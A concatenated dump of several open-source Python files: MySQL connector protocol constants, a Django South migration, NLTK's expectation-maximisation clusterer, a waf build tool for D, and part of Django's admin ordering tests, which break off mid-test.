@classmethod
def get_number_types(cls):
"""Get the list of all number types"""
return [
cls.DECIMAL, cls.NEWDECIMAL,
cls.TINY, cls.SHORT, cls.LONG,
cls.FLOAT, cls.DOUBLE,
cls.LONGLONG, cls.INT24,
cls.BIT,
cls.YEAR,
]
@classmethod
def get_timestamp_types(cls):
"""Get the list of all timestamp types"""
return [
cls.DATETIME, cls.TIMESTAMP,
]
class FieldFlag(_Flags):
"""MySQL Field Flags
Field flags as found in MySQL sources mysql-src/include/mysql_com.h
"""
_prefix = ''
NOT_NULL = 1 << 0
PRI_KEY = 1 << 1
UNIQUE_KEY = 1 << 2
MULTIPLE_KEY = 1 << 3
BLOB = 1 << 4
UNSIGNED = 1 << 5
ZEROFILL = 1 << 6
BINARY = 1 << 7
ENUM = 1 << 8
AUTO_INCREMENT = 1 << 9
TIMESTAMP = 1 << 10
SET = 1 << 11
NO_DEFAULT_VALUE = 1 << 12
ON_UPDATE_NOW = 1 << 13
NUM = 1 << 14
PART_KEY = 1 << 15
GROUP = 1 << 14 # SAME AS NUM !!!!!!!????
UNIQUE = 1 << 16
BINCMP = 1 << 17
GET_FIXED_FIELDS = 1 << 18
FIELD_IN_PART_FUNC = 1 << 19
FIELD_IN_ADD_INDEX = 1 << 20
FIELD_IS_RENAMED = 1 << 21
desc = {
'NOT_NULL': (1 << 0, "Field can't be NULL"),
'PRI_KEY': (1 << 1, "Field is part of a primary key"),
'UNIQUE_KEY': (1 << 2, "Field is part of a unique key"),
'MULTIPLE_KEY': (1 << 3, "Field is part of a key"),
'BLOB': (1 << 4, "Field is a blob"),
'UNSIGNED': (1 << 5, "Field is unsigned"),
'ZEROFILL': (1 << 6, "Field is zerofill"),
'BINARY': (1 << 7, "Field is binary "),
'ENUM': (1 << 8, "field is an enum"),
'AUTO_INCREMENT': (1 << 9, "field is a autoincrement field"),
'TIMESTAMP': (1 << 10, "Field is a timestamp"),
'SET': (1 << 11, "field is a set"),
'NO_DEFAULT_VALUE': (1 << 12, "Field doesn't have default value"),
'ON_UPDATE_NOW': (1 << 13, "Field is set to NOW on UPDATE"),
'NUM': (1 << 14, "Field is num (for clients)"),
'PART_KEY': (1 << 15, "Intern; Part of some key"),
'GROUP': (1 << 14, "Intern: Group field"), # Same as NUM
'UNIQUE': (1 << 16, "Intern: Used by sql_yacc"),
'BINCMP': (1 << 17, "Intern: Used by sql_yacc"),
'GET_FIXED_FIELDS': (1 << 18, "Used to get fields in item tree"),
'FIELD_IN_PART_FUNC': (1 << 19, "Field part of partition func"),
'FIELD_IN_ADD_INDEX': (1 << 20, "Intern: Field used in ADD INDEX"),
'FIELD_IS_RENAMED': (1 << 21, "Intern: Field is being renamed"),
}
class ServerCmd(_Constants):
"""MySQL Server Commands
"""
_prefix = 'COM_'
SLEEP = 0
QUIT = 1
INIT_DB = 2
QUERY = 3
FIELD_LIST = 4
CREATE_DB = 5
DROP_DB = 6
REFRESH = 7
SHUTDOWN = 8
STATISTICS = 9
PROCESS_INFO = 10
CONNECT = 11
PROCESS_KILL = 12
DEBUG = 13
PING = 14
TIME = 15
DELAYED_INSERT = 16
CHANGE_USER = 17
BINLOG_DUMP = 18
TABLE_DUMP = 19
CONNECT_OUT = 20
REGISTER_SLAVE = 21
STMT_PREPARE = 22
STMT_EXECUTE = 23
STMT_SEND_LONG_DATA = 24
STMT_CLOSE = 25
STMT_RESET = 26
SET_OPTION = 27
STMT_FETCH = 28
DAEMON = 29
BINLOG_DUMP_GTID = 30
RESET_CONNECTION = 31
desc = {
'SLEEP': (0, 'SLEEP'),
'QUIT': (1, 'QUIT'),
'INIT_DB': (2, 'INIT_DB'),
'QUERY': (3, 'QUERY'),
'FIELD_LIST': (4, 'FIELD_LIST'),
'CREATE_DB': (5, 'CREATE_DB'),
'DROP_DB': (6, 'DROP_DB'),
'REFRESH': (7, 'REFRESH'),
'SHUTDOWN': (8, 'SHUTDOWN'),
'STATISTICS': (9, 'STATISTICS'),
'PROCESS_INFO': (10, 'PROCESS_INFO'),
'CONNECT': (11, 'CONNECT'),
'PROCESS_KILL': (12, 'PROCESS_KILL'),
'DEBUG': (13, 'DEBUG'),
'PING': (14, 'PING'),
'TIME': (15, 'TIME'),
'DELAYED_INSERT': (16, 'DELAYED_INSERT'),
'CHANGE_USER': (17, 'CHANGE_USER'),
'BINLOG_DUMP': (18, 'BINLOG_DUMP'),
'TABLE_DUMP': (19, 'TABLE_DUMP'),
'CONNECT_OUT': (20, 'CONNECT_OUT'),
'REGISTER_SLAVE': (21, 'REGISTER_SLAVE'),
'STMT_PREPARE': (22, 'STMT_PREPARE'),
'STMT_EXECUTE': (23, 'STMT_EXECUTE'),
'STMT_SEND_LONG_DATA': (24, 'STMT_SEND_LONG_DATA'),
'STMT_CLOSE': (25, 'STMT_CLOSE'),
'STMT_RESET': (26, 'STMT_RESET'),
'SET_OPTION': (27, 'SET_OPTION'),
'STMT_FETCH': (28, 'STMT_FETCH'),
'DAEMON': (29, 'DAEMON'),
'BINLOG_DUMP_GTID': (30, 'BINLOG_DUMP_GTID'),
'RESET_CONNECTION': (31, 'RESET_CONNECTION'),
}
class ClientFlag(_Flags):
"""MySQL Client Flags
Client options as found in the MySQL sources mysql-src/include/mysql_com.h
"""
LONG_PASSWD = 1 << 0
FOUND_ROWS = 1 << 1
LONG_FLAG = 1 << 2
CONNECT_WITH_DB = 1 << 3
NO_SCHEMA = 1 << 4
COMPRESS = 1 << 5
ODBC = 1 << 6
LOCAL_FILES = 1 << 7
IGNORE_SPACE = 1 << 8
PROTOCOL_41 = 1 << 9
INTERACTIVE = 1 << 10
SSL = 1 << 11
IGNORE_SIGPIPE = 1 << 12
TRANSACTIONS = 1 << 13
RESERVED = 1 << 14
SECURE_CONNECTION = 1 << 15
MULTI_STATEMENTS = 1 << 16
MULTI_RESULTS = 1 << 17
PS_MULTI_RESULTS = 1 << 18
PLUGIN_AUTH = 1 << 19
CONNECT_ARGS = 1 << 20
PLUGIN_AUTH_LENENC_CLIENT_DATA = 1 << 21
CAN_HANDLE_EXPIRED_PASSWORDS = 1 << 22
SSL_VERIFY_SERVER_CERT = 1 << 30
REMEMBER_OPTIONS = 1 << 31
desc = {
'LONG_PASSWD': (1 << 0, 'New more secure passwords'),
'FOUND_ROWS': (1 << 1, 'Found instead of affected rows'),
'LONG_FLAG': (1 << 2, 'Get all column flags'),
'CONNECT_WITH_DB': (1 << 3, 'One can specify db on connect'),
'NO_SCHEMA': (1 << 4, "Don't allow database.table.column"),
'COMPRESS': (1 << 5, 'Can use compression protocol'),
'ODBC': (1 << 6, 'ODBC client'),
'LOCAL_FILES': (1 << 7, 'Can use LOAD DATA LOCAL'),
'IGNORE_SPACE': (1 << 8, "Ignore spaces before ''"),
'PROTOCOL_41': (1 << 9, 'New 4.1 protocol'),
'INTERACTIVE': (1 << 10, 'This is an interactive client'),
'SSL': (1 << 11, 'Switch to SSL after handshake'),
'IGNORE_SIGPIPE': (1 << 12, 'IGNORE sigpipes'),
'TRANSACTIONS': (1 << 13, 'Client knows about transactions'),
'RESERVED': (1 << 14, 'Old flag for 4.1 protocol'),
'SECURE_CONNECTION': (1 << 15, 'New 4.1 authentication'),
'MULTI_STATEMENTS': (1 << 16, 'Enable/disable multi-stmt support'),
'MULTI_RESULTS': (1 << 17, 'Enable/disable multi-results'),
'SSL_VERIFY_SERVER_CERT': (1 << 30, ''),
'REMEMBER_OPTIONS': (1 << 31, ''),
}
default = [
LONG_PASSWD,
LONG_FLAG,
CONNECT_WITH_DB,
PROTOCOL_41,
TRANSACTIONS,
SECURE_CONNECTION,
MULTI_STATEMENTS,
MULTI_RESULTS,
LOCAL_FILES,
]
@classmethod
def get_default(cls):
"""Get the default client options set
Returns a flag with all the default client options set"""
flags = 0
for option in cls.default:
flags |= option
return flags
class ServerFlag(_Flags):
"""MySQL Server Flags
Server flags as found in the MySQL sources mysql-src/include/mysql_com.h
"""
_prefix = 'SERVER_'
STATUS_IN_TRANS = 1 << 0
STATUS_AUTOCOMMIT = 1 << 1
MORE_RESULTS_EXISTS = 1 << 3
QUERY_NO_GOOD_INDEX_USED = 1 << 4
QUERY_NO_INDEX_USED = 1 << 5
STATUS_CURSOR_EXISTS = 1 << 6
STATUS_LAST_ROW_SENT = 1 << 7
STATUS_DB_DROPPED = 1 << 8
STATUS_NO_BACKSLASH_ESCAPES = 1 << 9
desc = {
'SERVER_STATUS_IN_TRANS': (1 << 0,
'Transaction has started'),
'SERVER_STATUS_AUTOCOMMIT': (1 << 1,
'Server in auto_commit mode'),
'SERVER_MORE_RESULTS_EXISTS': (1 << 3,
'Multi query - '
'next query exists'),
'SERVER_QUERY_NO_GOOD_INDEX_USED': (1 << 4, ''),
'SERVER_QUERY_NO_INDEX_USED': (1 << 5, ''),
'SERVER_STATUS_CURSOR_EXISTS': (1 << 6, ''),
'SERVER_STATUS_LAST_ROW_SENT': (1 << 7, ''),
'SERVER_STATUS_DB_DROPPED': (1 << 8, 'A database was dropped'),
'SERVER_STATUS_NO_BACKSLASH_ESCAPES': (1 << 9, ''),
}
class RefreshOption(_Constants):
"""MySQL Refresh command options
Options used when sending the COM_REFRESH server command.
"""
_prefix = 'REFRESH_'
GRANT = 1 << 0
LOG = 1 << 1
TABLES = 1 << 2
HOST = 1 << 3
STATUS = 1 << 4
THREADS = 1 << 5
SLAVE = 1 << 6
desc = {
'GRANT': (1 << 0, 'Refresh grant tables'),
'LOG': (1 << 1, 'Start on new log file'),
'TABLES': (1 << 2, 'close all tables'),
'HOSTS': (1 << 3, 'Flush host cache'),
'STATUS': (1 << 4, 'Flush status variables'),
'THREADS': (1 << 5, 'Flush thread cache'),
'SLAVE': (1 << 6, 'Reset master info and restart slave thread'),
}
class ShutdownType(_Constants):
"""MySQL Shutdown types
Shutdown types used by the COM_SHUTDOWN server command.
"""
_prefix = ''
SHUTDOWN_DEFAULT = 0
SHUTDOWN_WAIT_CONNECTIONS = 1
SHUTDOWN_WAIT_TRANSACTIONS = 2
SHUTDOWN_WAIT_UPDATES = 8
SHUTDOWN_WAIT_ALL_BUFFERS = 16
SHUTDOWN_WAIT_CRITICAL_BUFFERS = 17
KILL_QUERY = 254
KILL_CONNECTION = 255
desc = {
'SHUTDOWN_DEFAULT': (
SHUTDOWN_DEFAULT,
"defaults to SHUTDOWN_WAIT_ALL_BUFFERS"),
'SHUTDOWN_WAIT_CONNECTIONS': (
SHUTDOWN_WAIT_CONNECTIONS,
"wait for existing connections to finish"),
'SHUTDOWN_WAIT_TRANSACTIONS': (
SHUTDOWN_WAIT_TRANSACTIONS,
"wait for existing trans to finish"),
'SHUTDOWN_WAIT_UPDATES': (
SHUTDOWN_WAIT_UPDATES,
"wait for existing updates to finish"),
'SHUTDOWN_WAIT_ALL_BUFFERS': (
SHUTDOWN_WAIT_ALL_BUFFERS,
"flush InnoDB and other storage engine buffers"),
'SHUTDOWN_WAIT_CRITICAL_BUFFERS': (
SHUTDOWN_WAIT_CRITICAL_BUFFERS,
"don't flush InnoDB buffers, "
"flush other storage engines' buffers"),
'KILL_QUERY': (
KILL_QUERY,
"(no description)"),
'KILL_CONNECTION': (
KILL_CONNECTION,
"(no description)"),
}
class CharacterSet(_Constants):
"""MySQL supported character sets and collations
List of character sets with their collations supported by MySQL. This
maps to the character set we get from the server within the handshake
packet.
The list is hardcode so we avoid a database query when getting the
name of the used character set or collation.
"""
desc = MYSQL_CHARACTER_SETS
# Multi-byte character sets which use 5c (backslash) in characters
slash_charsets = (1, 13, 28, 84, 87, 88)
@classmethod
def get_info(cls, setid):
"""Retrieves character set information as tuple using an ID
Retrieves character set and collation information based on the
given MySQL ID.
Raises ProgrammingError when character set is not supported.
Returns a tuple.
"""
try:
return cls.desc[setid][0:2]
except IndexError:
raise ProgrammingError(
"Character set '{0}' unsupported".format(setid))
@classmethod
def get_desc(cls, setid):
"""Retrieves character set information as string using an ID
Retrieves character set and collation information based on the
given MySQL ID.
Returns a tuple.
"""
try:
return "%s/%s" % cls.get_info(setid)
except:
raise
@classmethod
def get_default_collation(cls, charset):
"""Retrieves the default collation for given character set
Raises ProgrammingError when character set is not supported.
Returns list (collation, charset, index)
"""
if isinstance(charset, int):
try:
info = cls.desc[charset]
return info[1], info[0], charset
except:
ProgrammingError("Character set ID '%s' unsupported." % (
charset))
for cid, info in enumerate(cls.desc):
if info is None:
continue
if info[0] == charset and info[2] is True:
return info[1], info[0], cid
raise ProgrammingError("Character set '%s' unsupported." % (charset))
@classmethod
def get_charset_info(cls, charset=None, collation=None):
"""Get character set information using charset name and/or collation
Retrieves character set and collation information given character
set name and/or a collation name.
If charset is an integer, it will look up the character set based
on the MySQL's ID.
For example:
get_charset_info('utf8',None)
get_charset_info(collation='utf8_general_ci')
get_charset_info(47)
Raises ProgrammingError when character set is not supported.
Returns a tuple with (id, characterset name, collation)
"""
if isinstance(charset, int):
try:
info = cls.desc[charset]
return (charset, info[0], info[1])
except IndexError:
ProgrammingError("Character set ID {0} unknown.".format(
charset))
if charset is not None and collation is None:
info = cls.get_default_collation(charset)
return (info[2], info[1], info[0])
elif charset is None and collation is not None:
for cid, info in enumerate(cls.desc):
if info is None:
continue
if collation == info[1]:
return (cid, info[0], info[1])
raise ProgrammingError("Collation '{0}' unknown.".format(collation))
else:
for cid, info in enumerate(cls.desc):
if info is None:
continue
if info[0] == charset and info[1] == collation:
return (cid, info[0], info[1])
raise ProgrammingError("Character set '{0}' unknown.".format(
charset))
@classmethod
def get_supported(cls):
"""Retrieves a list with names of all supproted character sets
Returns a tuple.
"""
res = []
for info in cls.desc:
if info and info[0] not in res:
res.append(info[0])
return tuple(res)
class SQLMode(_Constants): # pylint: disable=R0921
"""MySQL SQL Modes
The numeric values of SQL Modes are not interesting, only the names
are used when setting the SQL_MODE system variable using the MySQL
SET command.
See http://dev.mysql.com/doc/refman/5.6/en/server-sql-mode.html
"""
_prefix = 'MODE_'
REAL_AS_FLOAT = 'REAL_AS_FLOAT'
PIPES_AS_CONCAT = 'PIPES_AS_CONCAT'
ANSI_QUOTES = 'ANSI_QUOTES'
IGNORE_SPACE = 'IGNORE_SPACE'
NOT_USED = 'NOT_USED'
ONLY_FULL_GROUP_BY = 'ONLY_FULL_GROUP_BY'
NO_UNSIGNED_SUBTRACTION = 'NO_UNSIGNED_SUBTRACTION'
NO_DIR_IN_CREATE = 'NO_DIR_IN_CREATE'
POSTGRESQL = 'POSTGRESQL'
ORACLE = 'ORACLE'
MSSQL = 'MSSQL'
DB2 = 'DB2'
MAXDB = 'MAXDB'
NO_KEY_OPTIONS = 'NO_KEY_OPTIONS'
NO_TABLE_OPTIONS = 'NO_TABLE_OPTIONS'
NO_FIELD_OPTIONS = 'NO_FIELD_OPTIONS'
MYSQL323 = 'MYSQL323'
MYSQL40 = 'MYSQL40'
ANSI = 'ANSI'
NO_AUTO_VALUE_ON_ZERO = 'NO_AUTO_VALUE_ON_ZERO'
NO_BACKSLASH_ESCAPES = 'NO_BACKSLASH_ESCAPES'
STRICT_TRANS_TABLES = 'STRICT_TRANS_TABLES'
STRICT_ALL_TABLES = 'STRICT_ALL_TABLES'
NO_ZERO_IN_DATE = 'NO_ZERO_IN_DATE'
NO_ZERO_DATE = 'NO_ZERO_DATE'
INVALID_DATES = 'INVALID_DATES'
ERROR_FOR_DIVISION_BY_ZERO = 'ERROR_FOR_DIVISION_BY_ZERO'
TRADITIONAL = 'TRADITIONAL'
NO_AUTO_CREATE_USER = 'NO_AUTO_CREATE_USER'
HIGH_NOT_PRECEDENCE = 'HIGH_NOT_PRECEDENCE'
NO_ENGINE_SUBSTITUTION = 'NO_ENGINE_SUBSTITUTION'
PAD_CHAR_TO_FULL_LENGTH = 'PAD_CHAR_TO_FULL_LENGTH'
@classmethod
def get_desc(cls, name):
raise NotImplementedError
@classmethod
def get_info(cls, number):
raise NotImplementedError
@classmethod
def get_full_info(cls):
"""Returns a sequence of all available SQL Modes
This class method returns a tuple containing all SQL Mode names. The
names will be alphabetically sorted.
Returns a tuple.
"""
res = []
for key in vars(cls).keys():
if not key.startswith('_') \
and not hasattr(getattr(cls, key), '__call__'):
res.append(key)
return tuple(sorted(res))
| gpl-2.0 |
TEDICpy/write-it | contactos/migrations/0002_auto__add_field_contact_is_bounced.py | 2 | 2566 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contact.is_bounced'
db.add_column(u'contactos_contact', 'is_bounced',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Contact.is_bounced'
db.delete_column(u'contactos_contact', 'is_bounced')
models = {
u'contactos.contact': {
'Meta': {'object_name': 'Contact'},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contactos.ContactType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_bounced': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.Person']"}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
u'contactos.contacttype': {
'Meta': {'object_name': 'ContactType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'popit.apiinstance': {
'Meta': {'object_name': 'ApiInstance'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'url': ('popit.fields.ApiInstanceURLField', [], {'unique': 'True', 'max_length': '200'})
},
u'popit.person': {
'Meta': {'object_name': 'Person'},
'api_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['popit.ApiInstance']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'popit_url': ('popit.fields.PopItURLField', [], {'default': "''", 'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['contactos'] | gpl-3.0 |
Jaemu/haiku.py | nltk/cluster/em.py | 5 | 9530 | # Natural Language Toolkit: Expectation Maximization Clusterer
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Trevor Cohn <[email protected]>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import print_function
import numpy
from util import VectorSpaceClusterer
class EMClusterer(VectorSpaceClusterer):
"""
The Gaussian EM clusterer models the vectors as being produced by
a mixture of k Gaussian sources. The parameters of these sources
(prior probability, mean and covariance matrix) are then found to
maximise the likelihood of the given data. This is done with the
expectation maximisation algorithm. It starts with k arbitrarily
chosen means, priors and covariance matrices. It then calculates
the membership probabilities for each vector in each of the
clusters; this is the 'E' step. The cluster parameters are then
updated in the 'M' step using the maximum likelihood estimate from
the cluster membership probabilities. This process continues until
the likelihood of the data does not significantly increase.
"""
def __init__(self, initial_means, priors=None, covariance_matrices=None,
conv_threshold=1e-6, bias=0.1, normalise=False,
svd_dimensions=None):
"""
Creates an EM clusterer with the given starting parameters,
convergence threshold and vector mangling parameters.
:param initial_means: the means of the gaussian cluster centers
:type initial_means: [seq of] numpy array or seq of SparseArray
:param priors: the prior probability for each cluster
:type priors: numpy array or seq of float
:param covariance_matrices: the covariance matrix for each cluster
:type covariance_matrices: [seq of] numpy array
:param conv_threshold: maximum change in likelihood before deemed
convergent
:type conv_threshold: int or float
:param bias: variance bias used to ensure non-singular covariance
matrices
:type bias: float
:param normalise: should vectors be normalised to length 1
:type normalise: boolean
:param svd_dimensions: number of dimensions to use in reducing vector
dimensionsionality with SVD
:type svd_dimensions: int
"""
VectorSpaceClusterer.__init__(self, normalise, svd_dimensions)
self._means = numpy.array(initial_means, numpy.float64)
self._num_clusters = len(initial_means)
self._conv_threshold = conv_threshold
self._covariance_matrices = covariance_matrices
self._priors = priors
self._bias = bias
def num_clusters(self):
return self._num_clusters
def cluster_vectorspace(self, vectors, trace=False):
assert len(vectors) > 0
# set the parameters to initial values
dimensions = len(vectors[0])
means = self._means
priors = self._priors
if not priors:
priors = self._priors = numpy.ones(self._num_clusters,
numpy.float64) / self._num_clusters
covariances = self._covariance_matrices
if not covariances:
covariances = self._covariance_matrices = \
[ numpy.identity(dimensions, numpy.float64)
for i in range(self._num_clusters) ]
# do the E and M steps until the likelihood plateaus
lastl = self._loglikelihood(vectors, priors, means, covariances)
converged = False
while not converged:
if trace: print('iteration; loglikelihood', lastl)
# E-step, calculate hidden variables, h[i,j]
h = numpy.zeros((len(vectors), self._num_clusters),
numpy.float64)
for i in range(len(vectors)):
for j in range(self._num_clusters):
h[i,j] = priors[j] * self._gaussian(means[j],
covariances[j], vectors[i])
h[i,:] /= sum(h[i,:])
# M-step, update parameters - cvm, p, mean
for j in range(self._num_clusters):
covariance_before = covariances[j]
new_covariance = numpy.zeros((dimensions, dimensions),
numpy.float64)
new_mean = numpy.zeros(dimensions, numpy.float64)
sum_hj = 0.0
for i in range(len(vectors)):
delta = vectors[i] - means[j]
new_covariance += h[i,j] * \
numpy.multiply.outer(delta, delta)
sum_hj += h[i,j]
new_mean += h[i,j] * vectors[i]
covariances[j] = new_covariance / sum_hj
means[j] = new_mean / sum_hj
priors[j] = sum_hj / len(vectors)
# bias term to stop covariance matrix being singular
covariances[j] += self._bias * \
numpy.identity(dimensions, numpy.float64)
# calculate likelihood - FIXME: may be broken
l = self._loglikelihood(vectors, priors, means, covariances)
# check for convergence
if abs(lastl - l) < self._conv_threshold:
converged = True
lastl = l
def classify_vectorspace(self, vector):
best = None
for j in range(self._num_clusters):
p = self._priors[j] * self._gaussian(self._means[j],
self._covariance_matrices[j], vector)
if not best or p > best[0]:
best = (p, j)
return best[1]
def likelihood_vectorspace(self, vector, cluster):
cid = self.cluster_names().index(cluster)
return self._priors[cluster] * self._gaussian(self._means[cluster],
self._covariance_matrices[cluster], vector)
def _gaussian(self, mean, cvm, x):
m = len(mean)
assert cvm.shape == (m, m), \
'bad sized covariance matrix, %s' % str(cvm.shape)
try:
det = numpy.linalg.det(cvm)
inv = numpy.linalg.inv(cvm)
a = det ** -0.5 * (2 * numpy.pi) ** (-m / 2.0)
dx = x - mean
print(dx, inv)
b = -0.5 * numpy.dot( numpy.dot(dx, inv), dx)
return a * numpy.exp(b)
except OverflowError:
# happens when the exponent is negative infinity - i.e. b = 0
# i.e. the inverse of cvm is huge (cvm is almost zero)
return 0
def _loglikelihood(self, vectors, priors, means, covariances):
llh = 0.0
for vector in vectors:
p = 0
for j in range(len(priors)):
p += priors[j] * \
self._gaussian(means[j], covariances[j], vector)
llh += numpy.log(p)
return llh
def __repr__(self):
return '<EMClusterer means=%s>' % list(self._means)
def demo():
"""
Non-interactive demonstration of the clusterers with simple 2-D data.
"""
from nltk import cluster
# example from figure 14.10, page 519, Manning and Schutze
vectors = [numpy.array(f) for f in [[0.5, 0.5], [1.5, 0.5], [1, 3]]]
means = [[4, 2], [4, 2.01]]
clusterer = cluster.EMClusterer(means, bias=0.1)
clusters = clusterer.cluster(vectors, True, trace=True)
print('Clustered:', vectors)
print('As: ', clusters)
print()
for c in range(2):
print('Cluster:', c)
print('Prior: ', clusterer._priors[c])
print('Mean: ', clusterer._means[c])
print('Covar: ', clusterer._covariance_matrices[c])
print()
# classify a new vector
vector = numpy.array([2, 2])
print('classify(%s):' % vector, end=' ')
print(clusterer.classify(vector))
# show the classification probabilities
vector = numpy.array([2, 2])
print('classification_probdist(%s):' % vector)
pdist = clusterer.classification_probdist(vector)
for sample in pdist.samples():
print('%s => %.0f%%' % (sample,
pdist.prob(sample) *100))
#
# The following demo code is broken.
#
# # use a set of tokens with 2D indices
# vectors = [numpy.array(f) for f in [[3, 3], [1, 2], [4, 2], [4, 0], [2, 3], [3, 1]]]
# # test the EM clusterer with means given by k-means (2) and
# # dimensionality reduction
# clusterer = cluster.KMeans(2, euclidean_distance, svd_dimensions=1)
# print 'Clusterer:', clusterer
# clusters = clusterer.cluster(vectors)
# means = clusterer.means()
# print 'Means:', clusterer.means()
# print
# clusterer = cluster.EMClusterer(means, svd_dimensions=1)
# clusters = clusterer.cluster(vectors, True)
# print 'Clusterer:', clusterer
# print 'Clustered:', str(vectors)[:60], '...'
# print 'As:', str(clusters)[:60], '...'
# print
# # classify a new vector
# vector = numpy.array([3, 3])
# print 'classify(%s):' % vector,
# print clusterer.classify(vector)
# print
# # show the classification probabilities
# vector = numpy.array([2.2, 2])
# print 'classification_probdist(%s)' % vector
# pdist = clusterer.classification_probdist(vector)
# for sample in pdist:
# print '%s => %.0f%%' % (sample, pdist.prob(sample) *100)
if __name__ == '__main__':
demo()
| apache-2.0 |
lanfker/tdma_imac | .waf-1.6.7-0a94702c61504c487a251b8d0a04ca9a/waflib/Tools/d.py | 4 | 1957 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/svn/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys
from waflib import Utils,Task,Errors
from waflib.TaskGen import taskgen_method,feature,after_method,before_method,extension
from waflib.Configure import conf
from waflib.Tools.ccroot import link_task
from waflib.Tools import d_scan,d_config
from waflib.Tools.ccroot import link_task,stlink_task
class d(Task.Task):
color='GREEN'
run_str='${D} ${DFLAGS} ${DINC_ST:INCPATHS} ${D_SRC_F:SRC} ${D_TGT_F:TGT}'
scan=d_scan.scan
class d_with_header(d):
run_str='${D} ${DFLAGS} ${DINC_ST:INCPATHS} ${D_HDR_F:tgt.outputs[1].bldpath()} ${D_SRC_F:SRC} ${D_TGT_F:tgt.outputs[0].bldpath()}'
class d_header(Task.Task):
color='BLUE'
run_str='${D} ${D_HEADER} ${SRC}'
class dprogram(link_task):
run_str='${D_LINKER} ${DLNK_SRC_F}${SRC} ${DLNK_TGT_F:TGT} ${RPATH_ST:RPATH} ${DSTLIB_MARKER} ${DSTLIBPATH_ST:STLIBPATH} ${DSTLIB_ST:STLIB} ${DSHLIB_MARKER} ${LIBPATH_ST:LIBPATH} ${DSHLIB_ST:LIB} ${LINKFLAGS}'
inst_to='${BINDIR}'
chmod=Utils.O755
class dshlib(dprogram):
inst_to='${LIBDIR}'
class dstlib(stlink_task):
pass
def d_hook(self,node):
if getattr(self,'generate_headers',None):
task=self.create_compiled_task('d_with_header',node)
header_node=node.change_ext(self.env['DHEADER_ext'])
task.outputs.append(header_node)
else:
task=self.create_compiled_task('d',node)
return task
def generate_header(self,filename,install_path=None):
try:
self.header_lst.append([filename,install_path])
except AttributeError:
self.header_lst=[[filename,install_path]]
def process_header(self):
for i in getattr(self,'header_lst',[]):
node=self.path.find_resource(i[0])
if not node:
raise Errors.WafError('file %r not found on d obj'%i[0])
self.create_task('d_header',node,node.change_ext('.di'))
extension('.d','.di','.D')(d_hook)
taskgen_method(generate_header)
feature('d')(process_header) | gpl-2.0 |
andersonresende/django | tests/admin_ordering/tests.py | 37 | 6765 | from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.admin.options import ModelAdmin
from django.contrib.auth.models import User
from django.test import TestCase, RequestFactory
from .models import (Band, Song, SongInlineDefaultOrdering,
SongInlineNewOrdering, DynOrderingBandAdmin)
class MockRequest(object):
pass
class MockSuperUser(object):
def has_perm(self, perm):
return True
def has_module_perms(self, module):
return True
request = MockRequest()
request.user = MockSuperUser()
class TestAdminOrdering(TestCase):
"""
Let's make sure that ModelAdmin.get_queryset uses the ordering we define
in ModelAdmin rather that ordering defined in the model's inner Meta
class.
"""
def setUp(self):
self.request_factory = RequestFactory()
Band.objects.bulk_create([
Band(name='Aerosmith', bio='', rank=3),
Band(name='Radiohead', bio='', rank=1),
Band(name='Van Halen', bio='', rank=2),
])
def test_default_ordering(self):
"""
The default ordering should be by name, as specified in the inner Meta
class.
"""
ma = ModelAdmin(Band, admin.site)
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Aerosmith', 'Radiohead', 'Van Halen'], names)
def test_specified_ordering(self):
"""
Let's use a custom ModelAdmin that changes the ordering, and make sure
it actually changes.
"""
class BandAdmin(ModelAdmin):
ordering = ('rank',) # default ordering is ('name',)
ma = BandAdmin(Band, admin.site)
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Radiohead', 'Van Halen', 'Aerosmith'], names)
def test_dynamic_ordering(self):
"""
Let's use a custom ModelAdmin that changes the ordering dynamically.
"""
super_user = User.objects.create(username='admin', is_superuser=True)
other_user = User.objects.create(username='other')
request = self.request_factory.get('/')
request.user = super_user
ma = DynOrderingBandAdmin(Band, admin.site)
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Radiohead', 'Van Halen', 'Aerosmith'], names)
request.user = other_user
names = [b.name for b in ma.get_queryset(request)]
self.assertListEqual(['Aerosmith', 'Radiohead', 'Van Halen'], names)
class TestInlineModelAdminOrdering(TestCase):
"""
Let's make sure that InlineModelAdmin.get_queryset uses the ordering we
define in InlineModelAdmin.
"""
def setUp(self):
self.band = Band.objects.create(name='Aerosmith', bio='', rank=3)
Song.objects.bulk_create([
Song(band=self.band, name='Pink', duration=235),
Song(band=self.band, name='Dude (Looks Like a Lady)', duration=264),
Song(band=self.band, name='Jaded', duration=214),
])
def test_default_ordering(self):
"""
The default ordering should be by name, as specified in the inner Meta
class.
"""
inline = SongInlineDefaultOrdering(self.band, admin.site)
names = [s.name for s in inline.get_queryset(request)]
self.assertListEqual(['Dude (Looks Like a Lady)', 'Jaded', 'Pink'], names)
def test_specified_ordering(self):
"""
Let's check with ordering set to something different than the default.
"""
inline = SongInlineNewOrdering(self.band, admin.site)
